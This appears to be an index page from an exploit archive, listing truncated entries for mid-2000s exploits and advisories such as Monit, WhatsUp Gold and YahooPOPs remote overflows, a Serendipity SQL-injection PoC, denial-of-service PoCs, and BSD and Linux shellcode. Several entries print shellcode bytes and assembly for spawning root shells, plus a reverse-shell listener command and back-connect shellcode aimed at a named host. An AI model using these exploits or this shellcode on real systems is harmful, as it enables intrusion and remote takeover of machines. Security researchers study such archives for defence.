Monit 4.2 - Basic Authentication Remote Code Execution

Monit 4.2 - Basic Authentication Remote Code Execution / THE EYE ON SECURITY RESEARCH GROUP - INDIA http://www.eos-india.net/poc/305monit.c Remote Root Exploit for Monit linuxmailorg - Abhisek Datta abhisekfrontru 06.04.2004 http://www.eos-india.net New Targets : RedHat 9 Fedora Core 2 Slackware...

ProFTPd 1.2.10 - Remote Users Enumeration

/ Details Vulnerable Systems: ProFTPD Version 1.2.10 and below It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There ...

YahooPOPs 1.6 - SMTP Port Buffer Overflow

/ YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1 Exploit code by class101 at DFind.kd-team.com Bind a shellcode to the port 101. Thanx to Behrang [email protected] for the bug discovery Thanx to HDMoore and Metasploit.com for their kickass ASM work Instead of to move...

YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ================================================== YahooPOPs = 1.6 SMTP Port Buffer Overflow Exploit ================================================== / YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1 Exploit code by class1...

Microsoft Internet Explorer Install Engine contains a buffer overflow vulnerability

Overview The Active Setup Install Engine in Microsoft Internet Explorer contains a buffer overflow vulnerability. This may allow an attacker to take complete control of a vulnerable system. Description The Active Setup Install Engine inseng.dll permits cabinet files to be launched and executed...

Monolith Games Local Buffer Overflow Exploit

Exploit for unknown platform in category dos / poc ============================================ Monolith Games Local Buffer Overflow Exploit ============================================ / by Luigi Auriemma / include include include include ifdef WIN32 include include "winerr.h" define close...

IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl LoWNOISE NotmuchG.pl v.1.5 ================================================ IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit ================================================ Exploit by ET LoWNOISE Colombia etatcyberspace.org Oct/2004...

IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ========================================================= IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit ========================================================= !/usr/bin/perl LoWNOISE NotmuchG.pl v.1.5...

Debian DSA-184-1 : krb4 - buffer overflow

Tom Yu and Sam Hartman of MIT discovered another stack-based buffer overflow in the kadmserwrapin function in the Kerberos v4 administration server. This kadmind bug has a working exploit code circulating, hence it is considered serious. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The...

Microsoft SQL Server 7.0 - Remote Denial of Service (2)

// source: https://www.securityfocus.com/bid/11265/info Reportedly Microsoft SQL Server is affected by a remote denial of service vulnerability. This issue is due to a failure of the application to handle irregular network communications. An attacker may leverage this issue to cause the affected...

Serendipity 0.7-beta1 SQL Injection Proof of Concept

No description provided by source. Proof of Concept 1 ------------------ Usage: ./sersqlipoc.sh URLtoSerendipityWeblog sersqlipoc.sh ---------8-----------8------------- !/bin/sh echo -n "Username: " curl -I -s...

MyServer 0.7.1 - &#039;POST&#039; Denial of Service

// PoC to crash the server // / MyServer 0.7.1 POST Denial Of Service vendor URL: http://www.myserverproject.net coded and discovered by: badpack3t for .:sp research labs:. www.security-protocols.com 9.20.2004 Tested on Mandrake 10.0 usage: sp-myserv-0.7.1 targetport default is 80 / include inclu...

MyServer 0.7.1 (POST) Denial Of Service Exploit

Exploit for linux platform in category dos / poc =============================================== MyServer 0.7.1 POST Denial Of Service Exploit =============================================== // PoC to crash the server // / MyServer 0.7.1 POST Denial Of Service vendor URL:...

bsd/x86 execve /bin/sh setuid (0) 29 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...

bsd/x86 execve /bin/sh Crypt /bin/sh 49 bytes

No description provided by source. / Self decripting dec/inc shellcode executes /bin/sh Size 49 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short shellcode main: pop esi xor ecx,ecx mov cl,28 maindecript: inc byte esi+ecx loop maindecript inc byte esi push esi...

linux/x86 eject /dev/cdrom 64 bytes

Exploit for linux/x86 platform in category shellcode =================================== linux/x86 eject /dev/cdrom 64 bytes =================================== / CDROM EJECTING CODE by lamagra .data .globl main .type main,@function start: setreuid 0, 0 xorl %eax,%eax xorl %ebx,%ebx xorl %ecx,%ec...

bsdi/x86 execve /bin/sh 46 bytes

No description provided by source. / BSDi execve of /bin/sh by v9 [email protected] / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. / "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" / 14 characters. /...

bsd/x86 execve /bin/sh ENCRYPT* 57 bytes

Exploit for bsd/x86 platform in category shellcode ======================================== bsd/x86 execve /bin/sh ENCRYPT 57 bytes ======================================== / BSD version FreeBSD, OpenBSD, NetBSD. email protected 57 bytes. -Encriptado execve/bin/sh; Para mas informacion ver...

bsd/x86 - reverse portbind 129 bytes

bsd/x86 reverse portbind 129 bytes. Shellcode exploit for bsdx86 platform / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41,...

bsd/x86 - connect 93 bytes

bsd/x86 connect 93 bytes. Shellcode exploit for bsdx86 platform / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: po...